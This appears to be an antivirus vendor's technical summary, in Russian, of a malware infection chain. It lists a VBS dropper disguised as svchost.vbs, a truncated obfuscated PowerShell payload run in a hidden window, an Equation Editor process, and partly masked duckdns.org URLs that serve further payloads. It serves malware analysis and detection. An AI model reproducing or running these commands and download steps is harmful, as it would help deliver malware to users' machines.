Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\svchost.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $0C785E286C8436BBCBAF0E5E0BCBE5F27BD6BD86CBE294191A0D6CAD69284250C9341AE41850F277786BC91AC77791AF2692=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,1...
- %APPDATA%\svchost.vbs
- http://te#####93.duckdns.org/wewi/nemam.vbs
- http://ne#####4.duckdns.org/newmam/737.mt
- http://ne#####4.duckdns.org/newmam/oldmama.m83
- DNS ASK te#####93.duckdns.org
- DNS ASK ne#####4.duckdns.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $0C785E286C8436BBCBAF0E5E0BCBE5F27BD6BD86CBE294191A0D6CAD69284250C9341AE41850F277786BC91AC77791AF2692=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,1...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\svchost.exe' -k DcomLaunch -p -s PlugPlay